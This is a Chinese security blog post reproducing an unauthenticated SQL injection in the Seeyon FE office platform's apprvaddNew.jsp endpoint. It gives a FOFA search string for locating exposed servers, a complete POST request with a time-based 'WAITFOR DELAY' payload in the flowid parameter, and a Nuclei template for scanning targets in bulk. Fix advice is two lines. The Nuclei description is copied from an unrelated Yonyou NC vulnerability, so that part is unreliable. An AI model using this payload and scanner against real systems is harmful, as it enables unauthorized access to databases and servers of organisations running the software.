【漏洞复现】致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

已于 2024-08-05 19:17:09 修改
阅读量602 收藏 4
点赞数 4
分类专栏: 漏洞复现 文章标签: sql注入 威胁情报 安全漏洞 web安全
于 2024-08-05 19:06:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140934426
版权

文章目录

0x00 漏洞描述

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。
在受影响的版本中,攻击者可以未授权访问/witapprovemanage/apprvaddNew.jsp接口,利用 flowid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

影响范围

尚不明确

0x01 测绘工具

FOFA:body=“li_plugins_download”
在这里插入图片描述在这里插入图片描述

0x02 漏洞复现

POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
Host: x.x.x.x
User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
Content-Type:application/x-www-form-urlencoded
 
flowid=1';WAITFOR+DELAY+'0:0:5'--

在这里插入图片描述

0x03 Nuclei检测脚本

id: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

info:
  name: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
  author: admin
  severity: high
  description: 在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

requests:
  - method: POST
    path:
      - "{{BaseURL}}/witapprovemanage/apprvaddNew.jsp"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36

    body: |
      flowid=1';WAITFOR+DELAY+'0:0:5'--

    matchers:
      - type: word
        words:
          - "SQL"  # Adjust this based on known error messages if applicable

      - type: dsl
        dsl:
          - "response.time > 5000"  # Check if the response time is greater than 5 seconds

0x04 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

今天是 几号
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
致远互联FE协作办公平台 SQL注入漏洞复现
0xSec
12-08 1088
致远互联FE协作办公平台 editflow_manager.jsp、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
致远互联FE协作办公平台 apprvaddNew.jsp SQL注入漏洞复现
0xSec
08-03 493
致远互联FE协作办公平台 apprvaddNew.jsp 接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
致远互联FE协作办公平台editflow_manager存在sql注入漏洞
weixin_62352348的博客
01-15 390
致远互联FE协作办公平台editflow_manager存在sql注入漏洞
致远互联FE协作办公平台apprvaddNew接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-04 96
致远互联FE协作办公平台 apprvaddNewjsp 接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
漏洞复现】用友NC Cloud系统queryPsnInfo接口SQL注入
今天是几号的博客
08-05 965
在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
(附nuclei 批量验证文件)用友 畅捷通T+ ScheduleManageController SQL注入漏洞
nglj9527的博客
05-29 254
用友 畅捷通T+ ScheduleManageController 存在SQL注入漏洞,执行sql语句,获取数据库信息。
漏洞复现致远互联FE协作办公平台——SQL注入
LongL_GuYu的博客
06-30 552
致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。其ncsubjass.jsp接口处存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句。
致远互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现
0xSec
06-29 730
致远互联FE协作办公平台 codeMoreWidget.jsp接口处存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-18 107
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞(含批量验证poc)
致远互联FE协作办公平台 ncsubjass SQL注入致RCE漏洞复现
0xSec
06-17 904
致远互联FE协作办公平台 ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1611
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-06 1656
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-05 1305
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【学术会议征稿】第二届人工智能、系统与网络安全国际学术会议 (AISNS 2024)
XIAOAIXUEJIE的博客
09-05 781
(人工智能算法、自然语言处理、模糊逻辑、计算机视觉与图像理解、信号和图像处理、语音与自然语言处理、计算学习理论、信息检索与融合、混合智能系统、智能系统架构、知识表示、基于知识的系统、机电一体化、多媒体与认知信息学、人工神经网络并行处理、模式识别、普适计算与环境智能、软计算理论与应用、软硬件架构、自动编程、机器学习、自动控制、数据挖掘与机器学习工具、机器人学、人工智能工具与应用、最近的趋势和发展等)(操作系统、分布式系统、数据库系统、网络系统、编译系统、计算机体系结构、虚拟化技术、容器技术)
致远m3协同办公平台远程命令执行漏洞
01-09
致远m3协同办公平台是一款常用的企业协同办公软件,然而最近发现了该平台存在远程命令执行漏洞。这个漏洞存在意味着攻击者可以通过发送特定的命令来执行恶意操作,从而危害到企业的信息安全。 这个漏洞可能导致以下几种潜在风险:首先,攻击者可以利用漏洞来获取系统权限,进而窃取敏感信息或者破坏系统正常运行;其次,攻击者可以利用漏洞来植入恶意程序,对企业信息系统进行攻击和破坏;最后,攻击者还可以利用漏洞来传播恶意软件,进而影响到整个企业内部网络的安全。 为了解决这个漏洞带来的风险,企业需要立即采取行动。首先,应及时对致远m3协同办公平台进行补丁升级,以修复漏洞并加强系统安全性;其次,企业需要加强对员工的安全意识教育,提高员工对网络安全风险的认识,避免点击和打开未知来源的链接和附件;最后,企业还需要加强对网络安全的监控和管理,及时发现并应对潜在的安全威胁。 总之,致远m3协同办公平台的远程命令执行漏洞是一项严重的安全威胁,企业需要及时采取措施来应对这一风险,确保企业的信息系统安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值